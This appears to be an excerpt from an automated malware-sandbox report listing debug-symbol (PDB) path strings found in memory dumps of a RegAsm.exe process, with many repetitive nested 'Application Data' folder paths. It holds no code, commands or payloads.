        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q\C:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q~C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: t:\Naveen\mysvn\OpenFileFinder_src_vc8\OpenFileFinder\bin\win32\release\OpenFileFinder.pdb source: RegAsm.exe, 0000000F.00000002.3703692097.0000000000702000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q~C:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qYC:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qjC:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q{C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q]C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q{C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qnC:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qmC:\Documents and Settings\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q|C:\Documents and Settings\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qKC:\Documents and Settings\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
